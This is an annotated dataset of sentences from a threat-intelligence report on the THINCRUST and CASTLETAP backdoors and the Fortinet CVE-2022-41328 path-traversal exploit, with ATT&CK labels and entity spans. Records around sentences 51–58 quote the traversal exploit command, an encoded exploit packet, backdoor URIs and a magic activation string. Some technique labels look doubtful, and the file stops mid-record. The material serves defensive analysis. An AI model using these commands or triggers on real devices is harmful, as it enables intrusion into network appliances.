{ "uid": "aptnotes-13_aptnotes_report-p4-s29-cb1182", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 4, "sentence_id": 29, "context_before": "The threat actor modified the legitimate file /usr/local/lib/python3.8/proj/util/urls.py to include an additional malicious API call, show_device_info , which can be seen in Figure 3.", "sentence_text": "This allowed the threat actor to interact with the THINCRUST backdoor through POST requests to the URI “ /p/util/show_device_info ”.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Interact with THINCRUST backdoor via POST requests to a specific URI.", "entities": [ { "text": "the threat actor", "start": 13, "end": 29, "label": "ThreatActor" }, { "text": "interact with the THINCRUST backdoor through POST requests to the URI “ /p/util/show_device_info ”", "start": 33, "end": 131, "label": "Action" }, { "text": "THINCRUST backdoor", "start": 51, "end": 69, "label": "MalwareTool" }, { "text": "/p/util/show_device_info", "start": 105, "end": 129, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p5-s31-1b6a43", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 5, "sentence_id": 31, "context_before": "4/21", "sentence_text": "When a POST request was sent to the show_device_info URL, it passed the request to the function get_device_info in /usr/local/lib/python3.8/proj/util/views.py .", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": [ { "name": "Application Layer Protocol", "id": "T1071" } ], "procedure": "A POST request is sent to a malicious endpoint triggering backend function execution.", "entities": [ { "text": "POST request was sent", "start": 7, "end": 28, "label": "Action" }, { "text": "show_device_info URL", "start": 36, "end": 56, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p5-s32-b7d023", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 5, "sentence_id": 32, "context_before": "When a POST request was sent to the show_device_info URL, it passed the request to the function get_device_info in /usr/local/lib/python3.8/proj/util/views.py .", "sentence_text": "The FGMGTOKEN cookie is encrypted with an RSA key hardcoded into views.py and contained an RC4 key that decrypted the commands received through the DEVICEID cookie.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p5-s33-030955", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 5, "sentence_id": 33, "context_before": "The FGMGTOKEN cookie is encrypted with an RSA key hardcoded into views.py and contained an RC4 key that decrypted the commands received through the DEVICEID cookie.", "sentence_text": "The decrypted result of DEVICEID were a JSON encoded dictionary with the keys 'id' and 'key'.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p5-s34-a21ded", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 5, "sentence_id": 34, "context_before": "The decrypted result of DEVICEID were a JSON encoded dictionary with the keys 'id' and 'key'.", "sentence_text": "ID Command\n1 Execute the command line stored in 'key' 2 Write the contents of the HTTP request to the file stored in 'key'.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p6-s35-ba0518", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 6, "sentence_id": 35, "context_before": "ID Command\n1 Execute the command line stored in 'key' 2 Write the contents of the HTTP request to the file stored in 'key'.", "sentence_text": "While most files in views.py had the @login_required decorator applied to them [decorators are any functions (Syntax to call decorator: @) that extend the behavior of another function without explicitly modifying the code], the malicious function get_device_info utilized the Django python module native to the system to add a @csrf_exempt decorator to the function as seen in Figure 5.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Modify function to add csrf_exempt decorator, disabling security protection.", "entities": [ { "text": "the malicious function get_device_info", "start": 239, "end": 277, "label": "MalwareTool" }, { "text": "utilized the Django python module native to the system to add a @csrf_exempt decorator to the function", "start": 278, "end": 380, "label": "Action" }, { "text": "@csrf_exempt", "start": 342, "end": 354, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p6-s36-d340a0", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 6, "sentence_id": 36, "context_before": "While most files in views.py had the @login_required decorator applied to them [decorators are any functions (Syntax to call decorator: @) that extend the behavior of another function without explicitly modifying the code], the malicious function get_device_info utilized the Django python module native to the system to add a @csrf_exempt decorator to the function as seen in Figure 5.", "sentence_text": "This means that the POST request to the malicious API call did not require a login or CSRF token to successfully run.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p6-s37-ca78c3", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 6, "sentence_id": 37, "context_before": "This means that the POST request to the malicious API call did not require a login or CSRF token to successfully run.", "sentence_text": "in views.py , get_device_info , was the same as FortiManager, the API call used to access the backdoor was changed to /p/utils/fortigate_syslog_send on the FortiAnalyzer device, as seen in Figure 6. Exploitation of CVE-2022-41328 on FortiGate Devices After persistence was established across the FortiManager and FortiAnalyzer devices with the THINCRUST backdoor, the threat actor deployed FortiManager scripts to multiple FortiGate firewalls.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Deploy FortiManager scripts to multiple FortiGate firewalls.", "entities": [ { "text": "the threat actor", "start": 364, "end": 380, "label": "ThreatActor" }, { "text": "FortiManager scripts", "start": 390, "end": 410, "label": "MalwareTool" }, { "text": "deployed FortiManager scripts to multiple FortiGate firewalls", "start": 381, "end": 442, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p6-s38-957b73", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 6, "sentence_id": 38, "context_before": "in views.py , get_device_info , was the same as FortiManager, the API call used to access the backdoor was changed to /p/utils/fortigate_syslog_send on the FortiAnalyzer device, as seen in Figure 6.\nExploitation of CVE-2022-41328 on FortiGate Devices After persistence was established across the FortiManager and FortiAnalyzer devices with the THINCRUST backdoor, the threat actor deployed FortiManager scripts to multiple FortiGate firewalls.", "sentence_text": "This activity was logged in the FortiGate elog as seen in Figure 7.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p6-s39-8bf4c1", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 6, "sentence_id": 39, "context_before": "This activity was logged in the FortiGate elog as seen in Figure 7.", "sentence_text": "vd=\"root\" type=\"event\" subtype=\"system\" level=\"notice\" logdesc=\"Upload and run a script\" user=\"Fortimanager_Access\" ui=\"fgfmd\" msg=\" User Fortimanager_Access via fgfmd upload and run script: -- OK\" The threat actor deleted these FortiManager scripts from the FortiManager device before they could be recovered for analysis, but correlation of multiple event log types show that the scripts took advantage of a path traversal vulnerability (CVE-2022-41328).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Delete FortiManager scripts from the FortiManager device to prevent recovery.", "entities": [ { "text": "The threat actor", "start": 210, "end": 226, "label": "ThreatActor" }, { "text": "FortiManager scripts", "start": 241, "end": 261, "label": "MalwareTool" }, { "text": "deleted these FortiManager scripts from the FortiManager device", "start": 227, "end": 290, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p6-s40-71d26b", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 6, "sentence_id": 40, "context_before": "vd=\"root\"\ntype=\"event\"\nsubtype=\"system\"\nlevel=\"notice\" logdesc=\"Upload and run a script\" user=”Fortimanager_Access” ui=\"fgfmd\" msg=\" User Fortimanager_Access via fgfmd upload and run script: -- OK\" The threat actor deleted these FortiManager scripts from the FortiManager device before they could be recovered for analysis, but correlation of multiple event log types show that the scripts took advantage of a path traversal vulnerability (CVE-2022-41328).", "sentence_text": "The vulnerability was exploited by the threat actor using the command execute wireless-controller hs20-icon upload-icon (as seen in Figure 8).", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Exploited the vulnerability using the command 'execute wireless-controller hs20-icon upload-icon'.", "entities": [ { "text": "threat actor", "start": 39, "end": 51, "label": "ThreatActor" }, { "text": "command execute wireless-controller hs20-icon", "start": 62, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "exploited", "start": 22, "end": 31, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p6-s41-742d75", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 6, "sentence_id": 41, "context_before": "The vulnerability was exploited by the threat actor using the command execute wireless-controller hs20-icon upload-icon (as seen in Figure 8).", "sentence_text": "This command allowed the threat actor to overwrite legitimate files in a normally restricted system directory.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1565.001", "name": "Data Manipulation: Stored Data Manipulation" } ], "procedure": "Overwrite legitimate files in a restricted system directory.", "entities": [ { "text": "the threat actor", "start": 21, "end": 37, "label": "ThreatActor" }, { "text": "overwrite legitimate files in a normally restricted system directory", "start": 41, "end": 109, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p6-s42-c9d0c4", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 6, "sentence_id": 42, "context_before": "This command allowed the threat actor to overwrite legitimate files in a normally restricted system directory.", "sentence_text": "Normally, the execute wireless-controller hs20-icon upload-icon command is used to upload .ico files (icon files) from a 6/21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s43-e3c9ce", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 43, "context_before": "Normally, the execute wireless-controller hs20-icon upload-icon command is used to upload .ico files (icon files) from a 6/21", "sentence_text": "server to a FortiGate firewall using the File Transfer Protocol (“FTP”) or Trivial File Transfer Protocol (“TFTP”), where they can be used in HotSpot 2.0 Online Sign-Up (OSU) portals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s44-484bb4", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 44, "context_before": "server to a FortiGate firewall using the File Transfer Protocol (“FTP”) or Trivial File Transfer Protocol (“TFTP”), where they can be used in HotSpot 2.0 Online Sign-Up (OSU) portals.", "sentence_text": "HotSpot 2.0 is a technology which allows for devices to seamlessly switch between cellular data and public Wi-Fi.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s45-338ded", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 45, "context_before": "HotSpot 2.0 is a technology which allows for devices to seamlessly switch between cellular data and public Wi-Fi.", "sentence_text": "However, the execute wireless-controller hs20-icon upload-icon command suffered from two issues.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s46-ea678b", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 46, "context_before": "However, the execute wireless-controller hs20-icon upload-icon command suffered from two issues.", "sentence_text": "The command did not validate the type of file being uploaded and was susceptible to a directory traversal exploit allowing a threat actor with Super Administrator privileges to upload a file smaller than 65,535 bytes to any location on the file system.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "The attacker uploads files to arbitrary locations on the file system using a vulnerable command.", "entities": [ { "text": "upload a file smaller than 65,535 bytes to any location on the file system", "start": 177, "end": 251, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p7-s47-0ca310", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 47, "context_before": "The command did not validate the type of file being uploaded and was susceptible to a directory traversal exploit allowing a threat actor with Super Administrator privileges to upload a file smaller than 65,535 bytes to any location on the file system.", "sentence_text": "This means that outside of the size constraints of the command,­ a threat actor could replace any legitimate system file on the FortiGate firewall.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s48-c6d70c", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 48, "context_before": "This means that outside of the size constraints of the command,­ a threat actor could replace any legitimate system file on the FortiGate firewall.", "sentence_text": "Successful exploitation of the vulnerability (CVE-2022-41328) is not logged in FortiGate elogs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s49-71bf44", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 49, "context_before": "Successful exploitation of the vulnerability (CVE-2022-41328) is not logged in FortiGate elogs.", "sentence_text": "Around the time of the FortiManager script execution, the elogs recorded the threat actor’s failed attempts to overwrite the system file /bin/", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "The attacker attempts to overwrite system files on the device.", "entities": [ { "text": "failed attempts to overwrite the system file", "start": 92, "end": 136, "label": "Action" }, { "text": "/bin/", "start": 137, "end": 142, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p7-s50-bf2679", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 50, "context_before": "Around the time of the FortiManager script execution, the elogs recorded the threat actor’s failed attempts to overwrite the system file /bin/", "sentence_text": "lspci using this exploit, seen in Figure 8.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s51-19301c", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 51, "context_before": "lspci using this exploit, seen in Figure 8.", "sentence_text": "execute wireless-controller hs20-icon upload-icon ftp ../../../../../..", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s52-4ba7d6", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 52, "context_before": "execute wireless-controller hs20-icon upload-icon ftp ../../../../../..", "sentence_text": "/bin/lspci execute wireless-controller hs20-icon upload-icon tftp ../..", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s53-68632c", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 53, "context_before": "/bin/lspci Fortinet confirmed the exploitation of this command was not seen prior to these events and assigned the designation CVE-2022- 41328.", "sentence_text": "/../../../../bin/lspci Fortinet confirmed the exploitation of this command was not seen prior to these events and assigned the designation CVE-2022- 41328.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s54-4c1ea1", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 54, "context_before": "/../../../../bin/lspci Fortinet confirmed the exploitation of this command was not seen prior to these events and assigned the designation CVE-2022- 41328.", "sentence_text": "Fortinet successfully replicated the exploit using the syntax seen in the failed command events.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s55-879540", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 55, "context_before": "Fortinet successfully replicated the exploit using the syntax seen in the failed command events.", "sentence_text": "Further supporting evidence of attempted exploitation was found in FortiGuard logs events with “ file_transfer:\nTFTP.Server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s57-055e5a", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 57, "context_before": "Buffer.", "sentence_text": "Overflow repeated X times ” in the msg field.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s58-e95817", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 58, "context_before": "Overflow repeated X times ” in the msg field.", "sentence_text": "PFBBVFRFUk5TPiAAATsuLi88L1BBVFRFUk5TPgo8VVJJPiA8L1VSST4KPEhFQURFUj4gPC9IRUFERVI+CjxCT\n0RZPiA8L0JPRFk+CjxQQUNLRVQ+IAABLi4vLi4vLi4vLi4vLi4vLi4vYmluL2xzcGNpAG9jdGV0ADwvUEFDS0\nVUPg==\nBase 64 Decoded ..../../../../../../bin/lspci.octet. Symlink to Suspected Backdoor (/bin/lspci -> /bin/sysctl)\ncommands seen within FortiGate logs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s59-110417", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 59, "context_before": "PFBBVFRFUk5TPiAAATsuLi88L1BBVFRFUk5TPgo8VVJJPiA8L1VSST4KPEhFQURFUj4gPC9IRUFERVI+CjxCT\n0RZPiA8L0JPRFk+CjxQQUNLRVQ+IAABLi4vLi4vLi4vLi4vLi4vLi4vYmluL2xzcGNpAG9jdGV0ADwvUEFDS0\nVUPg==\nBase 64 Decoded ..../../../../../../bin/lspci.octet. Symlink to Suspected Backdoor (/bin/lspci -> /bin/sysctl)\ncommands seen within FortiGate logs.", "sentence_text": "In total, two variants of /bin/lspci were identified; a standalone version of the binary and a version which was symlinked to /bin/sysctl .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s60-8ad3a9", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 60, "context_before": "In total, two variants of /bin/lspci were identified; a standalone version of the binary and a version which was symlinked to /bin/sysctl .", "sentence_text": "Fortinet confirmed that /bin/lspci should always be a standalone binary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s61-c83451", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 61, "context_before": "Fortinet confirmed that /bin/lspci should always be a standalone binary.", "sentence_text": "File listing entries for /bin/lspci and /bin/sysctl on the compromised FortiGate firewalls contained similar timestamps that did not align with other legitimate binaries on the FortiGate machines.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s62-af0942", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 62, "context_before": "File listing entries for /bin/lspci and /bin/sysctl on the compromised FortiGate firewalls contained similar timestamps that did not align with other legitimate binaries on the FortiGate machines.", "sentence_text": "Additionally, the file size for /bin/sysctl on the compromised FortiGate firewall was much larger than reported on non-compromised devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p7-s63-3277ad", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 7, "sentence_id": 63, "context_before": "Additionally, the file size for /bin/sysctl on the compromised FortiGate firewall was much larger than reported on non-compromised devices.", "sentence_text": "The file listing snippets in Figure 10 and Figure 11 highlight the differences across the original and modified versions of /bin/lspci and /bin/sysctl present on the FortiGate firewalls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p8-s65-96901c", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 65, "context_before": "7/21", "sentence_text": "COMPROMISED-FGT101F # fnsysctl ls -la", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p8-s66-495f40", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 66, "context_before": "COMPROMISED-FGT101F # fnsysctl ls -la", "sentence_text": "Oct 19 05:11 lspci -> /bin/sysctl lrwxrwxrwx 1 root root 9 Oct 18 13:09 lted -> /bin/init lrwxrwxrwx 1 root root 9 Oct 18 13:09 memuploadd -> /bin/init -rwxr-xr-x 1 root root 1478216 Oct 19 05:11 sysctl NON-COMPROMISED-FGT101F # fnsysctl ls -la", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p8-s67-073248", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 67, "context_before": "Oct 19 05:11 lspci -> /bin/sysctl lrwxrwxrwx 1 root root 9 Oct 18 13:09 lted -> /bin/init lrwxrwxrwx 1 root root 9 Oct 18 13:09 memuploadd -> /bin/init -rwxr-xr-x 1 root root 1478216 Oct 19 05:11 sysctl NON-COMPROMISED-FGT101F # fnsysctl ls -la", "sentence_text": "Fri Sep 2 12:07:55 2022 251480 sysctl In addition to the differences in modification time and size, the output of the file listing command fnsysctl ls -l /bin displayed multiple fields in different formats and order.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "Differences in file listing output suggest system changes due to replaced /bin/sysctl (shell behavior altered).", "entities": [ { "text": "sysctl", "start": 31, "end": 37, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p8-s68-4b8313", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 68, "context_before": "Fri Sep 2 12:07:55 2022 251480 sysctl In addition to the differences in modification time and size, the output of the file listing command fnsysctl ls -l /bin displayed multiple fields in different formats and order.", "sentence_text": "This is likely due to the threat actor replacing /bin/sysctl and therefore changing the shell functionality on the FortiGate firewall.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Replace /bin/sysctl to alter system functionality.", "entities": [ { "text": "the threat actor", "start": 22, "end": 38, "label": "ThreatActor" }, { "text": "replacing /bin/sysctl", "start": 39, "end": 60, "label": "Action" }, { "text": "/bin/sysctl", "start": 49, "end": 60, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p8-s69-2e99d5", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 69, "context_before": "This is likely due to the threat actor replacing /bin/sysctl and therefore changing the shell functionality on the FortiGate firewall.", "sentence_text": "Changes made to the FortiOS file system are not persistent, so the files were unable to be recovered for analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p8-s70-6381b5", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 70, "context_before": "Changes made to the FortiOS file system are not persistent, so the files were unable to be recovered for analysis.", "sentence_text": "By default, Fortinet devices running FortiOS have an archive on disk labelled rootfs.gz within the /data/ partition.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p8-s71-fba122", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 71, "context_before": "By default, Fortinet devices running FortiOS have an archive on disk labelled rootfs.gz within the /data/ partition.", "sentence_text": "Upon boot, this file is mounted as the root filesystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p8-s72-2774eb", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 72, "context_before": "Upon boot, this file is mounted as the root filesystem.", "sentence_text": "This means if modifications are made to the mounted image, the changes will not be persistent unless they are written to the rootfs.gz archive.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p8-s73-7de4ba", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 73, "context_before": "This means if modifications are made to the mounted image, the changes will not be persistent unless they are written to the rootfs.gz archive.", "sentence_text": "FortiGate firewalls do not support files being exported from the mounted filesystem during runtime.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p8-s74-93b009", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 74, "context_before": "FortiGate firewalls do not support files being exported from the mounted filesystem during runtime.", "sentence_text": "Since the modifications made to /bin/lspci and /bin/sysctl were not written to the rootfs.gz archive, they were not installed persistently and could not be further analyzed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p8-s75-0b92d0", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 75, "context_before": "Since the modifications made to /bin/lspci and /bin/sysctl were not written to the rootfs.gz archive, they were not installed persistently and could not be further analyzed.", "sentence_text": "expected contents of the devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p8-s76-358cea", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 76, "context_before": "expected contents of the devices.", "sentence_text": "Comparing the forensic image of the compromised FortiGate firewall to a known-good version, Fortinet identified a trojanized firmware that contained a persistent backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": null, "procedure": "A trojanized firmware with a persistent backdoor is identified on the device.", "entities": [ { "text": "identified a trojanized firmware", "start": 101, "end": 133, "label": "Action" }, { "text": "persistent backdoor", "start": 151, "end": 170, "label": "MalwareTool" } ] }, { "uid": "aptnotes-13_aptnotes_report-p8-s77-62105e", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 77, "context_before": "Comparing the forensic image of the compromised FortiGate firewall to a known-good version, Fortinet identified a trojanized firmware that contained a persistent backdoor.", "sentence_text": "CASTLETAP (FortiGate Firewall Backdoor)\nAnalysis on the FortiGate firewalls identified an additional malicious file /bin/fgfm .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p8-s78-d5b486", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 8, "sentence_id": 78, "context_before": "CASTLETAP (FortiGate Firewall Backdoor)\nAnalysis on the FortiGate firewalls identified an additional malicious file /bin/fgfm .", "sentence_text": "The threat actor likely named the file ‘ fgfm ’ in an attempt to disguise the backdoor as the legitimate service ‘ fgfmd ’ which facilitates communication between the FortiManager and FortiGate firewalls.\n8/21", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Name the backdoor file as fgfm to disguise it as legitimate service fgfmd.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "named the file ‘ fgfm ’", "start": 24, "end": 47, "label": "Action" }, { "text": "disguise the backdoor as the legitimate service ‘ fgfmd ’", "start": 65, "end": 122, "label": "Action" }, { "text": "fgfm", "start": 41, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "fgfmd", "start": 115, "end": 120, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p9-s79-45fd5e", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 79, "context_before": "The threat actor likely named the file ‘ fgfm ’ in an attempt to disguise the backdoor as the legitimate service ‘ fgfmd ’ which facilitates communication between the FortiManager and FortiGate firewalls.\n8/21", "sentence_text": "Once executed, CASTLETAP created a raw promiscuous socket to sniff network traffic.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1040", "name": "Network Sniffing" } ], "procedure": "Create a promiscuous socket to sniff network traffic.", "entities": [ { "text": "CASTLETAP", "start": 15, "end": 24, "label": "MalwareTool" }, { "text": "created a raw promiscuous socket", "start": 25, "end": 57, "label": "Action" }, { "text": "sniff network traffic", "start": 61, "end": 82, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p9-s80-176e5d", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 80, "context_before": "Once executed, CASTLETAP created a raw promiscuous socket to sniff network traffic.", "sentence_text": "CASTLETAP then filtered and XOR decoded a 9-byte magic activation string in the payload of an ICMP echo request packet.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Filter and XOR decode a magic activation string from ICMP packet payload.", "entities": [ { "text": "CASTLETAP", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "filtered", "start": 15, "end": 23, "label": "Action" }, { "text": "XOR decoded a 9-byte magic activation string in the payload of an ICMP echo request packet", "start": 28, "end": 118, "label": "Action" }, { "text": "ICMP echo request packet", "start": 94, "end": 118, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p9-s81-195f08", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 81, "context_before": "CASTLETAP then filtered and XOR decoded a 9-byte magic activation string in the payload of an ICMP echo request packet.", "sentence_text": "Magic String Description 1qaz@WSXa Parse C2 information from ICMP payload and connect to it over SSL.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p9-s83-f95dec", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 